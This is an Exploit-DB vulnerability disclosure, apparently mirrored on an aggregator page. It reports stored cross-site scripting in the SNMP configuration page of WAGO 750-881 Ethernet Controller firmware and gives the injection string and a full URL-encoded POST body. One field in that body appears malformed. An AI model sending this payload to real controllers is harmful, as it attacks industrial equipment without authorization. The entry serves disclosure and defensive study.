WAGO 750-881 01.09.18 – Cross-Site Scripting

• Exploit Database
• 31 阅读

• 作者： SecuNinja
  日期： 2018-10-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45581/

• # Exploit Title: WAGO 750-881 01.09.18 - Cross-Site Scripting
  # Date: 2018-08-30
  # Exploit Author: SecuNinja (@secuninja)
  # Vendor Homepage: wago.com
  # Version: 01.09.18(13) and earlier
  # Affected Products: Ethernet Controller 750-881 - 01.09.18(13), 01.08.01 (10)
  # CVE : N/A
  
  # Description
  # WAGO 750-881 Ethernet Controller devices, versions 01.09.18(13) and before, 
  # have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi
  # SNMP_DESC or SNMP_LOC_SNMP_CONT field.
  
  # PoC
  # http://ip.address/webserv/cplcfg/snmp.ssi FORM fields SNMP_DESC, SNMP_LOC_SNMP_CONT
  # Exploit String "<svg/onload=alert(1)>
  # http-post-data:
  SNMP_DESC=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&SNMP_LOC%22%3E%3Csvg%2Fonload%3Dalert%282%29%3E&SNMP_CONT=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&SNMP_V1V2_ENABLE=SNMP_V1V2_ENABLE&SNMP1_LCOM_NAME=public&SNMP_TR_V1V2_1_IP=0.0.0.0&SNMP1_COM_NAME=public&SNMP_V1V2_TR1_VERSION=SNMP_V1V2_TR1_VERSION1&SNMP_TR_V1V2_2_IP=0.0.0.0&SNMP2_COM_NAME=public&SNMP_V1V2_TR2_VERSION=SNMP_V1V2_TR2_VERSION1&SUBMIT=SUBMIT